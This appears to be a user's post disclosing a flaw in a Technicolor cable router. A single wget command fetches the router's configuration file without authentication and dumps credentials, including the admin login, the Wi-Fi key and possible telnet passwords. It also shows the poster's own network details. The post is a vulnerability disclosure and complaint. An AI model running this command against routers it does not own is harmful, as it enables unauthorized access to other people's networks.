just do a

wget -q -O - http://192.168.0.1/goform/system/GatewaySettings.bin | strings

and receive

8021
!UPC1386571
    *    +
    SKKMRPXP
    27354285
    Broadcom
    Broadcom
TechnicolorAP
123456
#0x000102030405060708090A0B0C0D0EBB
0000001
CDP.
RG..
admin
Technicolor
clock.via.net
ntp.nasa.gov
tick.ucla.edu
FIRE
T802
UPC1386571
2.4G
UPC0118016
    SKKMRPXP
    EZXRXZZE
THOMSON
THOMSON
    SKKMRPXP
THOMSON
THOMSON
THOMSON
UPC.
<Admin
MLog
admin
admin

The last two lines are the admin login (user admin, password admin). I leave them set to their default config, because it does not increase security to change them...

The wireless name is UPC1386571 and the password SKKMRPXP:

Cell 08 - Address: 8C:04:FF:*:*:*
    Channel:11
    Frequency:2.462 GHz (Channel 11)
    Quality=54/70  Signal level=-56 dBm  
    Encryption key:on
    ESSID:"UPC1386571"
    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
      24 Mb/s; 36 Mb/s; 54 Mb/s
    Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s
    Mode:Master
    Extra:tsf=00000008198c21d5
    Extra: Last beacon: 220ms ago
    IE: IEEE 802.11i/WPA2 Version 1
        Group Cipher : TKIP
        Pairwise Ciphers (2) : CCMP TKIP
        Authentication Suites (1) : PSK
    IE: WPA Version 1
        Group Cipher : TKIP
        Pairwise Ciphers (2) : CCMP TKIP
        Authentication Suites (1) : PSK

There is no way to disable wireless (or edit the password) because I am greeted with the error message

The connection to the server was reset while the page was loading.

if I try to access the "Wireless" settings tab in the web UI. It is not possible to edit the dumped config file and write it back, because this is broken in current software.

De facto, anyone who figures out the algorithm that calcs the wifi password based on... well most propably just the MAC address or something other visible from the outside... can access my wireless network which I never activated (btw. internet was ordered WITHOUT wifi, because they want extra money for it!). If the wifi password is truely "random", the password is still only 8 digits only uppercase letters from which only E S P K M R X Z were observed so far (only 8!).

It is time to wrap that device in aluminium foil...

Edit: told you so... http://derstandard.at/2000028921659/UPC-Standard-WLAN-Passwoerter-kinderleicht-zu-knacken

I am sure TechnicolorAP / 123456 and the other strange strings are other login credentials, maybe used for telnet (did not try this on the internet connected/KabelBW provided unit):

Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'

Broadcom Corporation Embedded BFC Telnet Server (c) 2000-2008

WARNING: Access allowed by authorized users only.

Login:

other source for CSRF Vulnerabilities: https://www.nerdbox.it/technicolor-tc7200-multiple-csrf-vulnerabilities/